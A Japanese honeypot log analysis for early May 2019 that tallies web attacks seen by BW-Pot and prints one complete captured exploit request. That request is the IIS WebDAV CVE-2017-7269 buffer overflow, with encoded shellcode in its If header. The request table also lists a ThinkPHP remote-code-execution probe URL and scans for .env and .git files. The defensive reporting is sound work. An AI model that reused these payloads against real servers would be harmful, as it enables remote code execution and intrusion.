BW-Potのログ分析 (2019/05/01-2019/05/05)

BW-Pot

期間内の総アクセス件数は2,577件です。送信元IP数は449IPです。

・気になる通信
リクエストヘッダを細工するタイプの通信が来ておりました。
WebDAV脆弱性(CVE-2017-7269)に関する通信の模様です。
文字化けしておりますが以下のPOCかと思われます。

github.com

Host: localhost
Connection: Close
Content-Length: 0
If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾￿￿Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lk8sYkPkPypC0CY7uNQfr1TdKNrP0TKPRlLDKaBMDtKqbkxjoh70JNFP1yoP17PDlMls1QlYrnLmP7QXOlMZaI7K2hp22Nw4KqBjpBk12oLKQJ02kq03HE5WPQdOZm18PB0tKMxlXbk0XO0m1j3zCml0IrkLt2kiqxVnQYo01upvLva6ojmyqfgLxyPd5Xt9sQmHxoKqmLdSExbnxBk1Ho49qXSC6rkjlpK2kb8mLja8SDKjdDKKQ6pu90DmTNDaKqKOq1IPZr19ogpOhOo0ZtKzrXksVomqXPnc5qdm0ph1g2IPn0i2iJFR40hPLsGKvIwIoz5P1ioNwaGnw0WofRHnZofSIuWioJ5XkOpQKlqy921nqPjkSoanqrJPPr3r0Ph27ayCoev9oYEXk0OqImaFrNrBHkPp2aPtDNrNrB2r10Rb0S8hknunNoKkOZ5E96faZjp1KRHaplsipKPQygprJm4R0BJkoNvrHQenfeNTFIoiE019oogogNw27QF2HNMjfJxsKkOIEbeupqeMVNkZordu3kPM09pHkXQwyVDYpKPKPK8fLyoKOyonOpibMpa1W2Ed3NO1Qc2RCnONdpLnN0pS82PkPXkRKMay0Oo20BJm20jm2B01ZYrpjM20Wc88ZYfYJpO9o6u63MawP2FfXkTm3O9i4r4BmnlO4m8ma90vTLC2021ofc8LRV62iiRYoYEReEpqdLmNxu5EprTJvqZm0OdR0bmoTo4jl0Pb3bHLm1GFN1Kiovuu3JL9tHkXNpSc8FfRvqwnryoWeRJYpqGbHlq2kBOqwiovuaZkPBHXpee3rqFIo9EXhdPIoyo9oMsmjnOnOnrS5RC1ic3RLbE0rloloBS2VOsph2O2SsDlns51hPeIphhIbKNioKOp109OBLnmaP4mdlnP105P0nNNQoHLxkPAA>
件数 種別 リクエス
728 WordPressに関する調査 GET /wp-login.php
722 WordPressに対するブルートフォース攻撃 POST /wp-login.php
713 Bad Request
241 アクセス GET /
17 不正中継の調査 GET api.ipify[.]org/
8 不正中継の調査 GET api.binance[.]com/api/v1/time
7 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
6 ZmEuによるスキャン GET /phpMyAdmin/scripts/setup.php
6 ZmEuによるスキャン GET /phpmyadmin/scripts/setup.php
6 ZmEuによるスキャン GET /pma/scripts/setup.php
6 ZmEuによるスキャン GET /w00tw00t.at.blackhats.romanian.anti-sec:)
5 環境設定の調査 GET /.env
4 ThinkPHPに関する調査 GET /TP/public/index.php
4 ThinkPHPに対する攻撃 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
4 環境設定の調査 GET /api/.env
4 不明 GET /nx8j78af1b.jsp
4 ZmEuによるスキャン GET /phpmy/scripts/setup.php
4 ThinkPHPに対する攻撃 POST /TP/public/index.php?s=captcha
3 アクセス GET /favicon.ico
3 クローリング GET /robots.txt
3 不正中継の調査 GET 5.188.210.101/echo.php
2 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt
2 不明 GET /admin/
2 WordPressに関する調査 GET /blog/wp-includes/wlwmanifest.xml
2 WordPressに関する調査 GET /cms/wp-includes/wlwmanifest.xml
2 WebLogic に関する調査 GET /console/login/LoginForm.jsp
2 不明 GET /db/
2 WordPressに関する調査 GET /dev/wp-includes/wlwmanifest.xml
2 Apache Struts 2に関する調査 GET /index.action
2 JMXコンソールに関する調査 GET /jmx-console/
2 ZmEuによるスキャン phpMyAdminに関する調査 GET /myadmin/scripts/setup.php
2 不明 GET /pma/
2 WordPressに関する調査 GET /site/wp-includes/wlwmanifest.xml
2 サイトの構成調査 GET /sitemap.xml
2 WordPressに関する調査 GET /web/wp-includes/wlwmanifest.xml
2 WordPressに関する調査 GET /website/wp-includes/wlwmanifest.xml
2 WordPressに関する調査 GET /wordpress/wp-includes/wlwmanifest.xml
2 WordPressに関する調査 GET /wp-includes/wlwmanifest.xml
2 WordPressに関する調査 GET /wp/wp-includes/wlwmanifest.xml
2 WordPressに関する調査 GET /wwww/wp-includes/wlwmanifest.xml
2 クローリング HEAD /robots.txt
2 Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃 POST /users?page=&size=5
1 Laravelに関する調査 GET /.env.example
1 Gitに関する調査 GET /.git/config
1 WordPressのユーザー情報の取得 GET ///?author=1
1 WordPressのユーザー情報の取得 GET ///wp-json/wp/v2/users/
1 phpListに関する調査 GET /Lists/admin.php
1 ZmEuによるスキャン phpMyAdminに関する調査 GET /MyAdmin/scripts/setup.php
1 Tomato RAFに関する調査 GET /admin-scripts.asp
1 FreePBXに関する調査 GET /admin//config.php
1 Kubernetesに関する調査 GET /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/
1 ZmEuによるスキャン phpMyAdminに関する調査 GET /db/scripts/setup.php
1 Apache Strutsに関する調査 GET /index.do
1 WordPressに関する調査 GET /press/wp-login.php
1 不明 GET /script
1 Apache Struts 2に関する調査 GET /struts2-rest-showcase/orders.xhtml
1 DFindによるスキャン GET /w00tw00t.at.ISC.SANS.DFind:)
1 WebDAVに関する調査 GET /webdav/
1 WordPressに関する調査 GET /wordpress1/wp-login.php
1 WordPressに関する調査 GET /wordpress2/wp-login.php
1 WordPressに関する調査 GET /wordpress3/wp-login.php
1 WordPressに関する調査 GET /wordpress4/wp-login.php
1 WordPressに関する調査 GET /wordpress5/wp-login.php
1 WordPressに関する調査 GET /wordpress6/wp-login.php
1 WordPressのユーザー情報の取得 GET /wp-json/wp/v2/users/
1 WordPressに関する調査 GET /wp/wp-login.php
1 WordPressに関する調査 GET /wp2/wp-login.php
1 WordPressに関する調査 GET /wp4/wp-login.php
1 WordPressに関する調査 GET /wp5/wp-login.php
1 WordPressに関する調査 GET /wp6/wp-login.php
1 WordPressに関する調査 GET /wp7/wp-login.php
1 WordPressに関する調査 GET /wp8/wp-login.php
1 不正中継の調査 GET api.binance[.]com/api/v1/depth?symbol=ETHBTC
1 不正中継の調査 GET www.binance[.]com/api/v1/depth?symbol=ETHBTC
1 不正中継の調査 GET www.proxylists[.]net/proxyjudge.php
1 アクセス HEAD /
1 不明 OPTIONS /
1 Linksysの脆弱性に関する攻撃 POST 192.168.0[.]14/tmUnblock.cgi
1 WebDAV脆弱性(CVE-2017-7269)に関する攻撃 PROPFIND /